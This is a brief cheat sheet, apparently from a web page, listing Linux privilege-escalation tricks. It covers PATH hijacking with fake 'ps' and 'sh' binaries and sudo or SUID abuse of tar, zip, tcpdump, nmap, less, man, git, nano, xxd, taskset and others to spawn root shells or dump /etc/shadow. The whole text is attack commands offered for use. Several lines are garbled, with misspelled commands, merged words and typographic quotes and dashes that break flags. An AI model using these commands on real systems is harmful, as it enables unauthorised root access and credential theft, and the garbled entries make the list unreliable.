How to Gain Root privilege on Linux System !
Create a new ps file echo /bin/sh > ps
chmod +x ps
Create a new sh file echo /bin/sh > sh
chmod +x sh
set path to:
export PATH=/var/www/backup:${PATH}
run procwatch
Using zip command
$ cd /tmp
sudo zip test.zip test -T –unzip-command=”sh -c /bin/bash”
Using tar command
$ sudo tar cf /dev/null test.tgz –checkpoint=1 –checkpoint-action=exec=/bin/bash
tar cf /dev/null testfile –checkpoint=1 –checkpoint-action=exec=/bin/sh
Using strace command
$ sudo strace -o/dev/null /bin/bash
Using tcpdump command
$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root
Using nmap command
$ echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse
$ sudo nmap –script=/tmp/shell.nse
OR nmap –interactive !sh
Using scp command
$ sudo scp -S /path/yourscript x y
Using except command
$ sudo except spawn sh then sh
Using nano command
$ sudo nano -S /bin/bash type your command and hit CTRL+T
Using git command
$ sudo git help statustype: !/bin/bash
Using gdb/ftp command
$ sudo ftptype : !/bin/sh
Using Less command
sudo less /etc/hosts
!bash
Using Man command
sudo man /etc/hosts
!bash
Using Git command
sudo git help status
!bash
XXD is a Linux command that creates a hex dump of a given file when it has read permissions while SUID bit is enabled :
xxd “/etc/shadow” | xxd -r
Taskset are system binaries file having suid permissions :
taskset 1 /bin/sh -p
export PWD=’;/bin/bash’
